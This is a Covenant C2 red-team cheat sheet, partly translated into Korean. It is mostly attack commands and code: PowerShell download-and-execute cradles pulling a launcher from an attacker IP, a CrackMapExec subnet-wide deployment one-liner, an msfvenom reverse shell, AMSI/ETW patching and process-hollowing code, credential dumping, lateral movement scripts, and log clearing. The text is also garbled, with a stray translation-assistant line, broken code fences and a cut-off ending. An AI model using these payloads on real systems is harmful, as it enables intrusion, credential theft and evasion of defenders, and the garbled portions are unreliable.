Covenant C2 프레임워크 치트 시트
## 개요
Covenant는 레드팀 작업 및 침투 테스트를 위해 설계된 .NET 기반 명령 및 제어(C2) 프레임워크입니다. 팀 협업을 위한 웹 기반 인터페이스를 제공하고, 다양한 통신 프로토콜을 지원하며, .NET 어셈블리를 사용하는 Windows 환경에 특화된 광범위한 사후 익스플로이트 기능을 제공합니다.
⚠️ 경고: 이 도구는 승인된 침투 테스트 및 레드팀 연습 목적으로만 사용됩니다. 대상에 대해 사용하기 전에 적절한 승인을 받았는지 확인하세요.
설치
필수 조건
Docker 설치 (권장)
수동 설치
Kali Linux 설치
기본 사용법
초기 설정
웹 인터페이스 탐색
리스너 관리
HTTP 리스너 생성
HTTPS 리스너 생성
브리지 리스너 (SMB)
Grunt 생성 및 배포
PowerShell Grunt
바이너리 Grunt
MSBuild Grunt
InstallUtil Grunt
Grunt 관리
Grunt 상호작용
프로세스 관리
자격 증명 작업
측면 이동
고급 모듈
지속성 메커니즘
권한 상승
Would you like me to continue with more specific translations for the remaining sections? I can provide more detailed translations if you provide the specific text for each section.```bash
Install .NET Core SDK (3.1 or later)
wget https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb sudo dpkg -i packages-microsoft-prod.deb sudo apt update sudo apt install -y dotnet-sdk-6.0
Verify installation
dotnet —version
### Docker Installation (Recommended)
```bash
# Clone Covenant repository
git clone --recurse-submodules https://github.com/cobbr/Covenant.git
cd Covenant/Covenant
# Build Docker image
docker build -t covenant .
# Run Covenant container
docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant covenant
# Access web interface
# Navigate to https://localhost:7443Manual Installation
# Clone repository
git clone --recurse-submodules https://github.com/cobbr/Covenant.git
cd Covenant/Covenant
# Build Covenant
dotnet build
# Run Covenant
dotnet run
# Access web interface at https://localhost:7443Kali Linux Installation
# Install from Kali repositories
sudo apt update
sudo apt install covenant
# Or build from source
git clone https://github.com/cobbr/Covenant.git
cd Covenant/Covenant
dotnet build
dotnet runBasic Usage
Initial Setup
# First-time setup
1. Navigate to https://localhost:7443
2. Create admin user account
3. Accept SSL certificate warnings
4. Complete initial configuration wizard
# Default credentials (change immediately)
Username: CovenantAdmin
Password: CovenantPasswordWeb Interface Navigation
| 섹션 | 설명 |
|---|---|
| Dashboard | 활성 그런트와 리스너 개요 |
| Listeners | 통신 리스너 관리 |
| Grunts | 손상된 호스트(에이전트) 관리 |
| Tasks | 명령어와 모듈 실행하기 |
| Templates | Grunt 템플릿 및 런처 관리 |
| Users | 사용자 관리 및 권한 |
| Data | 수집된 데이터 및 파일 다운로드 |
Listeners Management
Creating HTTP Listener
# Web Interface Steps:
1. Navigate to Listeners → Create
2. Select HTTP Listener
3. Configure parameters:
- Name: HTTP-Listener-80
- Bind Address: 0.0.0.0
- Bind Port: 80
- Connect Address: [Your IP]
- Connect Port: 80
- Use SSL: False
# Advanced HTTP Configuration
- Profile: DefaultHttpProfile
- URLs: /en-us/index.html,/en-us/docs.html
- User Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Creating HTTPS Listener
# HTTPS Listener Configuration:
1. Navigate to Listeners → Create
2. Select HTTP Listener
3. Configure parameters:
- Name: HTTPS-Listener-443
- Bind Address: 0.0.0.0
- Bind Port: 443
- Connect Address: [Your IP]
- Connect Port: 443
- Use SSL: True
- SSL Certificate: [Upload or generate]
# Generate SSL Certificate
openssl req -new -x509 -keyout covenant.key -out covenant.crt -days 365 -nodesBridge Listener (SMB)
# SMB Bridge Configuration:
1. Navigate to Listeners → Create
2. Select Bridge Listener
3. Configure parameters:
- Name: SMB-Bridge
- Bind Address: 0.0.0.0
- Bind Port: 445
- Connect Address: [Target IP]
- Connect Port: 445
- Profile: SMBBridgeProfileGrunt Generation and Deployment
PowerShell Grunt
# Generate PowerShell launcher
1. Navigate to Launchers → PowerShell
2. Configure parameters:
- Listener: HTTP-Listener-80
- Delay: 5
- Jitter: 0.1
- Connect Attempts: 5000
- Kill Date: [Future date]
# Generated PowerShell command example:
powershell -Sta -Nop -Window Hidden -EncodedCommand [Base64EncodedPayload]
# Execute on target
powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://[IP]/launcher.ps1')"Binary Grunt
# Generate binary executable
1. Navigate to Launchers → Binary
2. Configure parameters:
- Listener: HTTPS-Listener-443
- Output Kind: ConsoleApplication
- Target Framework: net40
- Delay: 10
- Jitter: 0.2
# Download and execute on target
# Binary will be generated as .exe fileMSBuild Grunt
1. Navigate to Launchers → MSBuild
2. Configure listener and parameters
3. Generated MSBuild XML file:
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="MSBuild">
<MSBuildTask />
</Target>
<UsingTask TaskName="MSBuildTask" TaskFactory="CodeTaskFactory"
AssemblyFile="Microsoft.Build.Tasks.v4.0.dll">
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
// Covenant grunt code here
]]>
</Code>
</Task>
</UsingTask>
</Project>
# Execute with:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xmlInstallUtil Grunt
# InstallUtil launcher
1. Navigate to Launchers → InstallUtil
2. Configure parameters
3. Execute on target:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exeGrunt Management
Grunt Interaction
# Basic grunt commands
help # Show available commands
whoami # Get current user context
hostname # Get computer name
pwd # Get current directory
ls # List directory contents
cd [directory] # Change directory
cat [file] # Read file contents
download [file] # Download file from target
upload [local] [remote] # Upload file to targetProcess Management
# Process operations
ps # List running processes
kill [PID] # Terminate process
getpid # Get current process ID
ppid # Get parent process ID
# Process injection
inject [PID] [assembly] # Inject .NET assembly into process
shinject [PID] [shellcode] # Inject shellcode into processCredential Operations
# Credential harvesting
mimikatz # Execute Mimikatz
logonpasswords # Dump logon passwords
lsadump # Dump LSA secrets
dcsync [domain] [user] # DCSync attack
golden [options] # Golden ticket creation
# Token manipulation
steal_token [PID] # Steal process token
make_token [user] [pass] # Create new token
rev2self # Revert to original tokenLateral Movement
# WMI execution
wmi [computer] [command] # Execute command via WMI
wmiexec [computer] [user] [pass] [command] # WMI with credentials
# PowerShell remoting
winrm [computer] [command] # Execute via WinRM
invoke-command [computer] [scriptblock] # PowerShell remoting
# Service creation
sc [computer] [service] [binary] # Create and start serviceAdvanced Modules
Persistence Mechanisms
# Registry persistence
persist_registry [key] [value] [payload] # Registry autorun
# Scheduled task persistence
persist_schtask [name] [trigger] [payload] # Scheduled task
# Service persistence
persist_service [name] [payload] # Windows service
# WMI persistence
persist_wmi [filter] [consumer] [payload] # WMI event subscriptionPrivilege Escalation
# UAC bypass techniques
bypassuac [method] # Various UAC bypass methods
eventvwr # Event Viewer UAC bypass
fodhelper # FodHelper UAC bypass
computerdefaults # Computer Defaults UAC bypass
# Kernel exploits
ms16-032 # Secondary Logon Handle Privilege Escalation
ms16-135 # Windows Kernel-Mode Drivers EoPData Collection
# System information
sysinfo # Detailed system information
env # Environment variables
netstat # Network connections
arp # ARP table
route # Routing table
# File system operations
find [pattern] # Search for files
tree [directory] # Directory tree
drives # List available drivesNetwork Operations
# Port scanning
portscan [target] [ports] # TCP port scan
ping [target] # ICMP ping
nslookup [hostname] # DNS lookup
# Network shares
net share # List local shares
net use # List network connections
net view [computer] # List remote sharesTeam Collaboration
User Management
# Web Interface User Operations:
1. Navigate to Users section
2. Create new user accounts
3. Assign roles and permissions:
- Administrator: Full access
- User: Limited access
- Listener: Listener management onlyData Sharing
# File management
1. Navigate to Data → Files
2. View downloaded files from all grunts
3. Share files between team members
4. Export data for analysis
# Credential sharing
1. Navigate to Data → Credentials
2. View harvested credentials
3. Export credential databaseReporting
# Generate reports
1. Navigate to Data → Events
2. Filter by time range and grunt
3. Export activity logs
4. Generate executive summaryAutomation and Scripting
Grunt Automation Script
// C# automation script for Covenant
using System;
using System.Threading.Tasks;
using Covenant.Models;
public class AutomationScript
\\\\{
public async Task ExecuteAutomation(Grunt grunt)
\\\\{
// Automated reconnaissance
await grunt.ExecuteTask("whoami");
await grunt.ExecuteTask("hostname");
await grunt.ExecuteTask("sysinfo");
await grunt.ExecuteTask("ps");
// Credential harvesting
if (grunt.Integrity == "High")
\\\\{
await grunt.ExecuteTask("mimikatz");
await grunt.ExecuteTask("logonpasswords");
\\\\}
// Network discovery
await grunt.ExecuteTask("netstat");
await grunt.ExecuteTask("arp");
await grunt.ExecuteTask("net view");
// Persistence
await grunt.ExecuteTask("persist_registry HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Update payload.exe");
\\\\}
\\\\}PowerShell Automation
# PowerShell script for automated grunt management
function Invoke-CovenantAutomation \\\\{
param(
[string]$CovenantURL = "https://localhost:7443",
[string]$Username,
[string]$Password
)
# Authenticate to Covenant API
$auth = @\\\\{
UserName = $Username
Password = $Password
\\\\}
$session = Invoke-RestMethod -Uri "$CovenantURL/api/users/login" -Method POST -Body ($auth|ConvertTo-Json) -ContentType "application/json"
# Get active grunts
$grunts = Invoke-RestMethod -Uri "$CovenantURL/api/grunts" -Headers @\\\\{Authorization = "Bearer $($session.token)"\\\\}
foreach ($grunt in $grunts) \\\\{
if ($grunt.Status -eq "Active") \\\\{
Write-Host "Processing grunt: $($grunt.Name)"
# Execute reconnaissance commands
$commands = @("whoami", "hostname", "sysinfo", "ps")
foreach ($cmd in $commands) \\\\{
$task = @\\\\{
Type = "GruntTask"
GruntId = $grunt.Id
Command = $cmd
\\\\}
Invoke-RestMethod -Uri "$CovenantURL/api/grunttasks" -Method POST -Body ($task|ConvertTo-Json) -ContentType "application/json" -Headers @\\\\{Authorization = "Bearer $($session.token)"\\\\}
Start-Sleep -Seconds 2
\\\\}
\\\\}
\\\\}
\\\\}
# Usage
Invoke-CovenantAutomation -Username "admin" -Password "password"Batch Grunt Deployment
#!/bin/bash
# Batch grunt deployment script
COVENANT_URL="https://your-covenant-server:7443"
TARGETS_FILE="targets.txt"
# Generate PowerShell launcher
LAUNCHER=$(curl -s -k -X GET "$COVENANT_URL/api/launchers/powershell/1" -H "Authorization: Bearer $TOKEN"|jq -r '.LauncherString')
# Deploy to multiple targets
while read -r target; do
echo "[+] Deploying to $target"
# Method 1: WMI execution
impacket-wmiexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "powershell -exec bypass -c \"$LAUNCHER\""
# Method 2: PSExec
impacket-psexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "powershell -exec bypass -c \"$LAUNCHER\""
# Method 3: SMB + scheduled task
impacket-smbexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "schtasks /create /tn Update /tr \"powershell -exec bypass -c \\\"$LAUNCHER\\\"\" /sc once /st 00:00"
sleep 5
done < "$TARGETS_FILE"Evasion Techniques
AMSI Bypass
// AMSI bypass in Covenant grunt
[System.Diagnostics.CodeAnalysis.SuppressMessage("Microsoft.Usage", "CA2201:DoNotRaiseReservedExceptionTypes")]
public static void BypassAMSI()
\\\\{
try
\\\\{
var amsiContext = Marshal.AllocHGlobal(9076);
var amsiSession = Marshal.AllocHGlobal(9076);
var amsiScanBuffer = Marshal.AllocHGlobal(9076);
// AMSI bypass implementation
var amsiDll = LoadLibrary("amsi.dll");
var amsiScanBufferAddr = GetProcAddress(amsiDll, "AmsiScanBuffer");
var patch = new byte[] \\\\{ 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 \\\\};
var oldProtect = VirtualProtect(amsiScanBufferAddr, (UIntPtr)patch.Length, 0x40, out uint _);
Marshal.Copy(patch, 0, amsiScanBufferAddr, patch.Length);
VirtualProtect(amsiScanBufferAddr, (UIntPtr)patch.Length, oldProtect, out uint _);
\\\\}
catch \\\\{ \\\\}
\\\\}ETW Bypass
// ETW bypass implementation
public static void BypassETW()
\\\\{
try
\\\\{
var ntdll = LoadLibrary("ntdll.dll");
var etwEventWrite = GetProcAddress(ntdll, "EtwEventWrite");
var patch = new byte[] \\\\{ 0xC3 \\\\}; // ret instruction
var oldProtect = VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, 0x40, out uint _);
Marshal.Copy(patch, 0, etwEventWrite, patch.Length);
VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, oldProtect, out uint _);
\\\\}
catch \\\\{ \\\\}
\\\\}Process Hollowing
// Process hollowing implementation
public static void ProcessHollow(string targetProcess, byte[] payload)
\\\\{
var startupInfo = new STARTUPINFO();
var processInfo = new PROCESS_INFORMATION();
// Create suspended process
CreateProcess(null, targetProcess, IntPtr.Zero, IntPtr.Zero, false,
ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null,
ref startupInfo, out processInfo);
// Unmap original image
ZwUnmapViewOfSection(processInfo.hProcess, GetImageBase(processInfo.hProcess));
// Allocate memory and write payload
var baseAddress = VirtualAllocEx(processInfo.hProcess, GetImageBase(processInfo.hProcess),
payload.Length, AllocationType.Commit|AllocationType.Reserve,
MemoryProtection.ExecuteReadWrite);
WriteProcessMemory(processInfo.hProcess, baseAddress, payload, payload.Length, out _);
// Resume execution
ResumeThread(processInfo.hThread);
\\\\}Integration with Other Tools
Metasploit Integration
# Use Covenant with Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -f exe -o meterpreter.exe
# Upload via Covenant grunt
upload meterpreter.exe C:\Windows\Temp\update.exe
# Execute Metasploit payload
execute C:\Windows\Temp\update.exe
# Use Metasploit for post-exploitation
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 443
runBloodHound Integration
# Collect BloodHound data via Covenant
# Upload SharpHound to target
upload SharpHound.exe C:\Windows\Temp\collector.exe
# Run BloodHound collection
execute C:\Windows\Temp\collector.exe -c All -d domain.local
# Download collected data
download C:\Windows\Temp\*BloodHound.zip
# Import into BloodHound
neo4j start
./BloodHound --no-sandbox
# Import downloaded zip fileCrackMapExec Integration
# Use CME for initial access, Covenant for persistence
# Initial compromise via CME
crackmapexec smb 192.168.1.0/24 -u username -p password --exec-method wmiexec -x "powershell -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/launcher.ps1')\""
# Verify Covenant grunt connection
# Use Covenant for further exploitationOperational Security
Communication Security
# Use domain fronting
1. Configure CloudFlare or similar CDN
2. Set up domain fronting rules
3. Configure Covenant listener with fronted domain
4. Use legitimate-looking URLs and user agents
# Certificate management
# Use legitimate SSL certificates
certbot certonly --standalone -d your-domain.com
# Configure Covenant with legitimate certificateTraffic Obfuscation
# Custom HTTP profiles
1. Navigate to Profiles → HTTP
2. Create custom profile mimicking legitimate traffic:
- User agents from target environment
- URLs matching legitimate applications
- Headers matching expected traffic
# Malleable C2 profiles
# Create custom communication patterns
# Mimic legitimate applications (Office 365, Google, etc.)Anti-Forensics
# Event log clearing
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
# Timestomping
timestomp C:\Windows\Temp\payload.exe -f C:\Windows\System32\notepad.exe
# Memory cleanup
# Implement memory wiping in custom tasks
# Use process migration to avoid memory analysisTroubleshooting
Common Issues
# Grunt not connecting
1. Check firewall rules on Covenant server
2. Verify listener configuration
3. Test network connectivity
4. Check antivirus interference
# SSL certificate issues
# Generate new certificate
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
# Performance issues
# Increase grunt delay and jitter
# Use multiple listeners for load balancing
# Optimize task execution frequencyDebug Mode
# Enable debug logging
1. Navigate to Administration → Settings
2. Enable debug logging
3. Check logs in Data → Events
4. Monitor grunt communication
# Network troubleshooting
# Use Wireshark to analyze traffic
# Check for network filtering
# Verify DNS resolutionDatabase Issues
# Reset Covenant database
cd Covenant/Covenant
rm -rf Data/covenant.db
dotnet run
# Backup database
cp Data/covenant.db Data/covenant.db.backup
# Restore database
cp Data/covenant.db.backup Data/covenant.db모범 사례
운영 계획```bash
Secure Covenant deployment
Use strong authentication
Enable HTTPS with valid certificates
Implement network segmentation
Regular security updates
Grunt management
Use unique grunt names
Implement kill dates
Regular grunt rotation
Secure communication channels
**사전 참여 설정**: 참여 전에 리스너와 프로필 구성bash
Maintain operation logs
Document all activities
Track compromised systems
Record credential harvesting
Generate executive reports
### 보안 고려사항
https://www.youtube.com/watch?v=E_K0nduqeuQ
### 문서화
https://www.sans.org/cyber-security-courses/red-team-operations-adversary-emulation/
## 리소스
- [Covenant GitHub 저장소](